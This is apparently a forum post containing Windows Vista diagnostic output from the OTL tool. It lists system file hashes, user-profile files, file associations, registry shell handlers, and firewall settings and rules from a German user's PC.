[2006.11.02 13:58:10 | 000,000,006 | -H-- | C] () -- C:\Windows\Tasks\SA.DAT
[2006.11.02 13:58:10 | 000,032,534 | ---- | C] () -- C:\Windows\Tasks\SCHEDLGU.TXT
[2012.06.10 19:25:39 | 000,000,884 | ---- | C] () -- C:\Windows\Tasks\Adobe Flash Player Updater.job
 
< MD5 for: AGP440.SYS  >
[2008.01.19 08:42:25 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_51b95d75\AGP440.sys
[2008.01.19 08:42:25 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_f750e484\AGP440.sys
[2008.01.19 08:42:25 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\winsxs\x86_machine.inf_31bf3856ad364e35_6.0.6001.18000_none_ba12ed3bbeb0d97a\AGP440.sys
[2008.01.19 08:42:25 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\winsxs\x86_machine.inf_31bf3856ad364e35_6.0.6002.18005_none_bbfe6647bbd2a4c6\AGP440.sys
[2006.11.02 10:49:52 | 000,053,864 | ---- | M] (Microsoft Corporation) MD5=EF23439CDD587F64C2C1B8825CEAD7D8 -- C:\Windows\System32\drivers\AGP440.sys
[2006.11.02 10:49:52 | 000,053,864 | ---- | M] (Microsoft Corporation) MD5=EF23439CDD587F64C2C1B8825CEAD7D8 -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_920a2c1f\AGP440.sys
 
< MD5 for: ATAPI.SYS  >
[2009.04.11 07:32:26 | 000,019,944 | ---- | M] (Microsoft Corporation) MD5=1F05B78AB91C9075565A9D8A4B880BC4 -- C:\Windows\System32\drivers\atapi.sys
[2009.04.11 07:32:26 | 000,019,944 | ---- | M] (Microsoft Corporation) MD5=1F05B78AB91C9075565A9D8A4B880BC4 -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_b12d8e84\atapi.sys
[2009.04.11 07:32:26 | 000,019,944 | ---- | M] (Microsoft Corporation) MD5=1F05B78AB91C9075565A9D8A4B880BC4 -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6002.18005_none_df23a1261eab99e8\atapi.sys
[2008.01.19 08:41:30 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=2D9C903DC76A66813D350A562DE40ED9 -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_cc18792d\atapi.sys
[2008.01.19 08:41:30 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=2D9C903DC76A66813D350A562DE40ED9 -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6001.18000_none_dd38281a2189ce9c\atapi.sys
[2006.11.02 10:49:36 | 000,019,048 | ---- | M] (Microsoft Corporation) MD5=4F4FCB8B6EA06784FB6D475B7EC7300F -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_c6c2e699\atapi.sys
[2011.02.19 16:35:42 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=B35CFCEF838382AB6490B321C87EDF17 -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_7de13c21\atapi.sys
[2011.02.19 16:35:42 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=B35CFCEF838382AB6490B321C87EDF17 -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6000.16632_none_db337a442479c42c\atapi.sys
[2011.02.19 16:35:41 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=E03E8C99D15D0381E02743C36AFC7C6F -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6000.20757_none_dbac78a93da31a8b\atapi.sys
 
< MD5 for: CNGAUDIT.DLL  >
[2006.11.02 10:46:03 | 000,011,776 | ---- | M] (Microsoft Corporation) MD5=7F15B4953378C8B5161D65C26D5FED4D -- C:\Windows\System32\cngaudit.dll
[2006.11.02 10:46:03 | 000,011,776 | ---- | M] (Microsoft Corporation) MD5=7F15B4953378C8B5161D65C26D5FED4D -- C:\Windows\winsxs\x86_microsoft-windows-cngaudit-dll_31bf3856ad364e35_6.0.6000.16386_none_e62d292932a96ce6\cngaudit.dll
 
< MD5 for: EXPLORER.EXE  >
[2011.02.19 16:34:36 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=37440D09DEAE0B672A04DCCF7ABF06BE -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.16771_none_4f83bb287ccdb7e3\explorer.exe
[2011.02.19 16:34:35 | 002,927,104 | ---- | M] (Microsoft Corporation) MD5=4F554999D7D5F05DAAEBBA7B5BA1089D -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6001.18164_none_5177ca9879e978e8\explorer.exe
[2011.02.19 16:34:35 | 002,927,616 | ---- | M] (Microsoft Corporation) MD5=50BA5850147410CDE89C523AD3BC606E -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6001.22298_none_51e4f8c7931bd1e1\explorer.exe
[2011.02.19 17:04:57 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=6D06CD98D954FE87FB2DB8108793B399 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.16549_none_4fac29707cae347a\explorer.exe
[2011.02.19 17:04:57 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=BD06F0BF753BC704B653C3A50F89D362 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.20668_none_501f261995dcf2cf\explorer.exe
[2009.04.11 07:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) MD5=D07D4C3038F3578FFCE1C0237F2A1253 -- C:\Windows\explorer.exe
[2009.04.11 07:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) MD5=D07D4C3038F3578FFCE1C0237F2A1253 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6002.18005_none_53a0201e76de3a0b\explorer.exe
[2011.02.19 16:34:36 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=E7156B0B74762D9DE0E66BDCDE06E5FB -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.20947_none_5033cb5995cd990b\explorer.exe
[2006.11.02 10:45:07 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=FD8C53FB002217F6F888BCF6F5D7084D -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.16386_none_4f7de5167cd15deb\explorer.exe
[2008.01.19 08:33:10 | 002,927,104 | ---- | M] (Microsoft Corporation) MD5=FFA764631CB70A30065C12EF8E174F9F -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6001.18000_none_51b4a71279bc6ebf\explorer.exe
 
< MD5 for: IASTOR.SYS  >
[2008.04.15 18:54:16 | 000,388,120 | ---- | M] (Intel Corporation) MD5=8D58627FEF3F8767665D9F4DC91CBD97 -- C:\Swsetup\Drivers\64\HDD\IaStor.sys
[2008.04.15 18:54:16 | 000,388,120 | ---- | M] (Intel Corporation) MD5=8D58627FEF3F8767665D9F4DC91CBD97 -- C:\Swsetup\Drivers\Global\INTELMSM\Winall\Driver64\IaStor.sys
[2008.04.15 18:53:44 | 000,312,344 | ---- | M] (Intel Corporation) MD5=DB0CC620B27A928D968C1A1E9CD9CB87 -- C:\Swsetup\Drivers\32\HDD\IaStor.sys
[2008.04.15 18:53:44 | 000,312,344 | ---- | M] (Intel Corporation) MD5=DB0CC620B27A928D968C1A1E9CD9CB87 -- C:\Swsetup\Drivers\Global\INTELMSM\Winall\Driver\IaStor.sys
 
< MD5 for: IASTORV.SYS  >
[2008.01.19 08:42:51 | 000,235,064 | ---- | M] (Intel Corporation) MD5=54155EA1B0DF185878E0FC9EC3AC3A14 -- C:\Windows\System32\DriverStore\FileRepository\iastorv.inf_c9df7691\iaStorV.sys
[2008.01.19 08:42:51 | 000,235,064 | ---- | M] (Intel Corporation) MD5=54155EA1B0DF185878E0FC9EC3AC3A14 -- C:\Windows\winsxs\x86_iastorv.inf_31bf3856ad364e35_6.0.6001.18000_none_af11527887c7fa8f\iaStorV.sys
[2006.11.02 10:51:25 | 000,232,040 | ---- | M] (Intel Corporation) MD5=C957BF4B5D80B46C5017BF0101E6C906 -- C:\Windows\System32\drivers\iaStorV.sys
[2006.11.02 10:51:25 | 000,232,040 | ---- | M] (Intel Corporation) MD5=C957BF4B5D80B46C5017BF0101E6C906 -- C:\Windows\System32\DriverStore\FileRepository\iastorv.inf_37cdafa4\iaStorV.sys
 
< MD5 for: NETLOGON.DLL  >
[2006.11.02 10:46:11 | 000,559,616 | ---- | M] (Microsoft Corporation) MD5=889A2C9F2AACCD8F64EF50AC0B3D553B -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.0.6000.16386_none_fb80f5473b0ed783\netlogon.dll
[2009.04.11 07:28:23 | 000,592,896 | ---- | M] (Microsoft Corporation) MD5=95DAECF0FB120A7B5DA679CC54E37DDE -- C:\Windows\System32\netlogon.dll
[2009.04.11 07:28:23 | 000,592,896 | ---- | M] (Microsoft Corporation) MD5=95DAECF0FB120A7B5DA679CC54E37DDE -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.0.6002.18005_none_ffa3304f351bb3a3\netlogon.dll
[2008.01.19 08:35:36 | 000,592,384 | ---- | M] (Microsoft Corporation) MD5=A8EFC0B6E75B789F7FD3BA5025D4E37F -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.0.6001.18000_none_fdb7b74337f9e857\netlogon.dll
 
< MD5 for: NVSTOR.SYS  >
[2006.11.02 10:50:13 | 000,040,040 | ---- | M] (NVIDIA Corporation) MD5=9E0BA19A28C498A6D323D065DB76DFFC -- C:\Windows\System32\drivers\nvstor.sys
[2006.11.02 10:50:13 | 000,040,040 | ---- | M] (NVIDIA Corporation) MD5=9E0BA19A28C498A6D323D065DB76DFFC -- C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_733654ff\nvstor.sys
[2008.01.19 08:42:09 | 000,045,112 | ---- | M] (NVIDIA Corporation) MD5=ABED0C09758D1D97DB0042DBB2688177 -- C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_31c3d71d\nvstor.sys
[2008.01.19 08:42:09 | 000,045,112 | ---- | M] (NVIDIA Corporation) MD5=ABED0C09758D1D97DB0042DBB2688177 -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.0.6001.18000_none_39dac327befea467\nvstor.sys
 
< MD5 for: SCECLI.DLL  >
[2008.01.19 08:36:19 | 000,177,152 | ---- | M] (Microsoft Corporation) MD5=28B84EB538F7E8A0FE8B9299D591E0B9 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.0.6001.18000_none_380de25bd91b6f12\scecli.dll
[2006.11.02 10:46:12 | 000,176,640 | ---- | M] (Microsoft Corporation) MD5=80E2839D05CA5970A86D7BE2A08BFF61 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.0.6000.16386_none_35d7205fdc305e3e\scecli.dll
[2009.04.11 07:28:24 | 000,177,152 | ---- | M] (Microsoft Corporation) MD5=8FC182167381E9915651267044105EE1 -- C:\Windows\System32\scecli.dll
[2009.04.11 07:28:24 | 000,177,152 | ---- | M] (Microsoft Corporation) MD5=8FC182167381E9915651267044105EE1 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.0.6002.18005_none_39f95b67d63d3a5e\scecli.dll
 
< MD5 for: USER32.DLL  >
[2011.02.19 14:18:15 | 000,633,856 | ---- | M] (Microsoft Corporation) MD5=63B4F59D7C89B1BF5277F1FFEFD491CD -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6000.16438_none_cb39bc5b7047127e\user32.dll
[2011.02.19 14:18:15 | 000,633,856 | ---- | M] (Microsoft Corporation) MD5=9D9F061EDA75425FC67F0365E3467C86 -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6000.20537_none_cbc258dc896598f1\user32.dll
[2008.01.19 08:36:46 | 000,627,200 | ---- | M] (Microsoft Corporation) MD5=B974D9F06DC7D1908E825DC201681269 -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6001.18000_none_cd386c416d5c7f32\user32.dll
[2006.11.02 10:46:13 | 000,633,856 | ---- | M] (Microsoft Corporation) MD5=E698A5437B89A285ACA3FF022356810A -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6000.16386_none_cb01aa4570716e5e\user32.dll
[2009.04.11 07:28:25 | 000,627,712 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\Windows\System32\user32.dll
[2009.04.11 07:28:25 | 000,627,712 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6002.18005_none_cf23e54d6a7e4a7e\user32.dll
 
< MD5 for: USERINIT.EXE  >
[2008.01.19 08:33:33 | 000,025,088 | ---- | M] (Microsoft Corporation) MD5=0E135526E9785D085BCD9AEDE6FBCBF9 -- C:\Windows\System32\userinit.exe
[2008.01.19 08:33:33 | 000,025,088 | ---- | M] (Microsoft Corporation) MD5=0E135526E9785D085BCD9AEDE6FBCBF9 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.0.6001.18000_none_dc28ba15d1aff80b\userinit.exe
[2006.11.02 10:45:50 | 000,024,576 | ---- | M] (Microsoft Corporation) MD5=22027835939F86C3E47AD8E3FBDE3D11 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.0.6000.16386_none_d9f1f819d4c4e737\userinit.exe
 
< MD5 for: WINLOGON.EXE  >
[2012.12.14 16:49:28 | 000,216,424 | ---- | M] () MD5=22101A85B3CA2FE2BE05FE9A61A7A83D -- C:\Program Files\Malwarebytes' Anti-Malware\Chameleon\winlogon.exe
[2009.04.11 07:28:13 | 000,314,368 | ---- | M] (Microsoft Corporation) MD5=898E7C06A350D4A1A64A9EA264D55452 -- C:\Windows\System32\winlogon.exe
[2009.04.11 07:28:13 | 000,314,368 | ---- | M] (Microsoft Corporation) MD5=898E7C06A350D4A1A64A9EA264D55452 -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6002.18005_none_71ae7a22d2134741\winlogon.exe
[2006.11.02 10:45:57 | 000,308,224 | ---- | M] (Microsoft Corporation) MD5=9F75392B9128A91ABAFB044EA350BAAD -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6000.16386_none_6d8c3f1ad8066b21\winlogon.exe
[2008.01.19 08:33:37 | 000,314,880 | ---- | M] (Microsoft Corporation) MD5=C2610B6BDBEFC053BBDAB4F1B965CB24 -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6001.18000_none_6fc30116d4f17bf5\winlogon.exe
 
< MD5 for: WS2IFSL.SYS  >
[2006.11.02 09:58:26 | 000,015,872 | ---- | M] (Microsoft Corporation) MD5=84620AECDCFD2A7A14E6263927D8C0ED -- C:\Windows\winsxs\x86_microsoft-windows-w..rastructure-ws2ifsl_31bf3856ad364e35_6.0.6000.16386_none_4d4fded8cae2956d\ws2ifsl.sys
[2008.01.19 06:56:49 | 000,015,872 | ---- | M] (Microsoft Corporation) MD5=E3A3CB253C0EC2494D4A61F5E43A389C -- C:\Windows\System32\drivers\ws2ifsl.sys
[2008.01.19 06:56:49 | 000,015,872 | ---- | M] (Microsoft Corporation) MD5=E3A3CB253C0EC2494D4A61F5E43A389C -- C:\Windows\winsxs\x86_microsoft-windows-w..rastructure-ws2ifsl_31bf3856ad364e35_6.0.6001.18000_none_4f86a0d4c7cda641\ws2ifsl.sys
 
< %systemroot%\system32\drivers\*.sys /lockedfiles >
 
< %systemroot%\System32\config\*.sav >
[2006.11.02 11:34:05 | 000,008,192 | ---- | M] () -- C:\Windows\System32\config\COMPONENTS.SAV
[2006.11.02 11:34:05 | 000,020,480 | ---- | M] () -- C:\Windows\System32\config\DEFAULT.SAV
[2006.11.02 11:34:05 | 000,008,192 | ---- | M] () -- C:\Windows\System32\config\SECURITY.SAV
[2006.11.02 11:34:08 | 010,133,504 | ---- | M] () -- C:\Windows\System32\config\SOFTWARE.SAV
[2006.11.02 11:34:08 | 001,826,816 | ---- | M] () -- C:\Windows\System32\config\SYSTEM.SAV
 
< %systemroot%\system32\*.dll /lockedfiles >
 
< %USERPROFILE%\*.* >
[2012.06.03 16:11:51 | 000,000,021 | ---- | M] () -- C:\Users\TuS\.gtk-bookmarks
[2013.02.18 21:29:48 | 000,021,751 | ---- | M] () -- C:\Users\TuS\.recently-used.xbel
[2012.09.11 20:05:02 | 000,224,118 | ---- | M] () -- C:\Users\TuS\01108_yaquinaheadlighthouse_1280x800.jpg
[2013.02.18 23:33:26 | 002,097,152 | -HS- | M] () -- C:\Users\TuS\NTUSER.DAT
[2013.02.18 23:33:26 | 000,262,144 | -H-- | M] () -- C:\Users\TuS\ntuser.dat.LOG1
[2011.02.18 16:50:49 | 000,000,000 | -H-- | M] () -- C:\Users\TuS\ntuser.dat.LOG2
[2013.02.18 17:31:30 | 000,065,536 | -HS- | M] () -- C:\Users\TuS\NTUSER.DAT{d8932e6d-6a6f-11db-b6ab-a038f15a5785}.TM.blf
[2013.02.18 17:31:30 | 000,524,288 | -HS- | M] () -- C:\Users\TuS\NTUSER.DAT{d8932e6d-6a6f-11db-b6ab-a038f15a5785}.TMContainer00000000000000000001.regtrans-ms
[2011.02.18 17:19:44 | 000,524,288 | -HS- | M] () -- C:\Users\TuS\NTUSER.DAT{d8932e6d-6a6f-11db-b6ab-a038f15a5785}.TMContainer00000000000000000002.regtrans-ms
[2011.02.18 16:50:50 | 000,000,020 | -HS- | M] () -- C:\Users\TuS\ntuser.ini
[2012.11.20 19:18:36 | 000,047,432 | ---- | M] () -- C:\Users\TuS\umbrella0.log
 
< %USERPROFILE%\Local Settings\Temp\*.exe >
 
< %USERPROFILE%\Local Settings\Temp\*.dll >
 
< %USERPROFILE%\Application Data\*.exe >
 
< HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems|Windows /rs >
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems\\Required: DebugWindows [binary data]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems\\Windows: %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16
 
<           >

< End of report >
         
--- --- ---


[QUOTE=Extras.txt]OTL Logfile:
Code:
ATTFilter
OTL Extras logfile created on: 18.02.2013 23:28:40 - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\TuS\Desktop
Windows Vista Home Basic Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy
 
1,93 Gb Total Physical Memory | 0,84 Gb Available Physical Memory | 43,54% Memory free
4,10 Gb Paging File | 2,67 Gb Available in Paging File | 65,16% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 222,88 Gb Total Space | 174,72 Gb Free Space | 78,39% Space Free | Partition Type: NTFS
Drive D: | 1021,00 Mb Total Space | 1015,54 Mb Free Space | 99,46% Space Free | Partition Type: FAT32
Drive E: | 9,00 Gb Total Space | 1,65 Gb Free Space | 18,38% Space Free | Partition Type: NTFS
Drive G: | 1863,01 Gb Total Space | 1809,74 Gb Free Space | 97,14% Space Free | Partition Type: NTFS
Drive H: | 465,65 Gb Total Space | 206,65 Gb Free Space | 44,38% Space Free | Partition Type: FAT32
 
Computer Name: TUS-PC | User Name: TuS | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\System32\control.exe (Microsoft Corporation)
.hlp [@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation)
 
[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)
 
========== Shell Spawning ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)
htmlfile [edit] -- Reg Error: Key error.
htmlfile [print] -- rundll32.exe %windir%\system32\mshtml.dll,PrintHTML "%1"
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files\VLC Player\vlc.exe" --started-from-file --playlist-enqueue "%1" ()
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files\VLC Player\vlc.exe" --started-from-file --no-playlist-enqueue "%1" ()
Folder [open] -- %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /separate,/e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
========== Security Center Settings ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
"VistaSp1" = Reg Error: Unknown registry data type -- File not found
"VistaSp2" = Reg Error: Unknown registry data type -- File not found
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
========== Authorized Applications List ==========
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{057D27D1-B87A-43B4-8BF7-619F9B2DF478}" = rport=3702 | protocol=17 | dir=out | app=%systemroot%\system32\p2phost.exe | 
"{0A70B203-CD7F-41C2-BFD8-EB5A8B4B4349}" = rport=3540 | protocol=17 | dir=out | svc=pnrpsvc | app=%systemroot%\system32\svchost.exe | 
"{206286A9-5709-4AEE-BE25-1D359BB6B697}" = lport=3587 | protocol=6 | dir=in | svc=p2psvc | app=%systemroot%\system32\svchost.exe | 
"{21B6C9B4-B224-434B-B786-16C397DAE91F}" = lport=5722 | protocol=6 | dir=in | svc=dfsr | app=%systemroot%\system32\dfsr.exe | 
"{23540C13-646E-4035-A0AA-BCA5F6789642}" = lport=3587 | protocol=6 | dir=in | svc=p2psvc | app=%systemroot%\system32\svchost.exe | 
"{270DFD55-1C59-4102-8356-9FC4C85F2333}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{4433E133-38A7-4517-A121-057F86527125}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{44F4B623-327D-447E-A5E9-BADA5404472D}" = lport=3540 | protocol=17 | dir=in | svc=pnrpsvc | app=%systemroot%\system32\svchost.exe | 
"{51782EC5-5106-4C58-9335-ADB35D8526F3}" = rport=5722 | protocol=6 | dir=out | svc=dfsr | app=%systemroot%\system32\dfsr.exe | 
"{73922679-2FA8-4CD9-B1C3-6483D115C3A7}" = rport=3702 | protocol=17 | dir=out | app=%systemroot%\system32\p2phost.exe | 
"{7E96D817-15F3-425C-8599-FCC0FAD660CC}" = lport=3702 | protocol=17 | dir=in | app=%systemroot%\system32\p2phost.exe | 
"{8E7064EA-3EF1-47BA-BD0D-20E760B4A099}" = lport=3702 | protocol=17 | dir=in | app=%systemroot%\system32\p2phost.exe | 
"{8F82233B-3ECE-43A3-BEE8-B07624BBBA4C}" = rport=5722 | protocol=6 | dir=out | svc=dfsr | app=%systemroot%\system32\dfsr.exe | 
"{9C9C09DE-B81F-48DA-86B6-38C5D1D55829}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{9E555EE3-C125-40A2-8D57-6B19969C9440}" = lport=5722 | protocol=6 | dir=in | svc=dfsr | app=%systemroot%\system32\dfsr.exe | 
"{A22F06AF-89EF-4215-AB25-5F35286067F1}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{AA99495E-47B0-4118-BEE4-47A39EC45D51}" = rport=3587 | protocol=6 | dir=out | svc=p2psvc | app=%systemroot%\system32\svchost.exe | 
"{B3535AD2-5D0E-41DB-AE6F-1DE9B36B5D2F}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=c:\windows\system32\svchost.exe | 
"{D16BD2BF-ADA8-4B79-867D-348827EBFA31}" = rport=3587 | protocol=6 | dir=out | svc=p2psvc | app=%systemroot%\system32\svchost.exe | 
"{D67306CB-3431-4BB3-8513-DFEFEB9CB82D}" = rport=3540 | protocol=17 | dir=out | svc=pnrpsvc | app=%systemroot%\system32\svchost.exe | 
"{FE136888-106D-4079-B7BA-94F51B5B9C7D}" = lport=3540 | protocol=17 | dir=in | svc=pnrpsvc | app=%systemroot%\system32\svchost.exe | 
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0819217F-77E9-4E62-8F9C-825430376B8F}" = dir=in | app=c:\program files\itunes\itunes.exe | 
"{095C0471-5E91-4D4E-A99E-65BC95ED0459}" = protocol=6 | dir=in | app=c:\program files\pinnacle\shared files\programs\strmserver\strmserver.exe | 
"{0A6129E9-AB35-44CA-9126-61C9240A5FDA}" = protocol=17 | dir=in | app=c:\program files\common files\pctv systems\pvr\videocontrol.exe | 
"{1171A7E0-ED4C-44FE-BA71-4B92D901D573}" = protocol=17 | dir=in | app=c:\program files\common files\pctv systems\streamingserver\strmserver.exe | 
"{15ACA777-C543-45D1-AFB2-CCD314B8ECF9}" = protocol=17 | dir=out | app=%programfiles%\windows collaboration\wincollab.exe | 
"{215C8497-7D58-431C-8243-AA3D3C005ADA}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe | 
"{2526B81B-0AD0-4F14-A024-7EBF67F4C2C6}" = protocol=6 | dir=out | app=%systemroot%\system32\p2phost.exe | 
"{2B2B4BB3-0B9D-41E5-AA2B-AB2FC39ED731}" = protocol=6 | dir=in | app=c:\program files\common files\pctv systems\pvr\videocontrol.exe | 
"{2F415971-FFC0-4D66-A1BE-6FC5E52C86D3}" = dir=in | app=c:\program files\common files\apple\apple application support\webkit2webprocess.exe | 
"{5096DAFF-47E2-471E-9EBA-8662273B37DF}" = protocol=6 | dir=in | app=c:\program files\common files\pctv systems\streamingserver\strmserver.exe | 
"{520BE724-8A03-43CA-80C2-5AEA79E756DA}" = dir=in | app=c:\program files\skype\phone\skype.exe | 
"{55F89377-B20F-4B3E-89B8-B99FE1BB8631}" = protocol=17 | dir=in | app=c:\program files\pctv systems\tvcenter\tvcenter.exe | 
"{59F9AFCC-4B25-47D8-8D03-3C194B899FF2}" = protocol=6 | dir=out | app=%systemroot%\system32\p2phost.exe | 
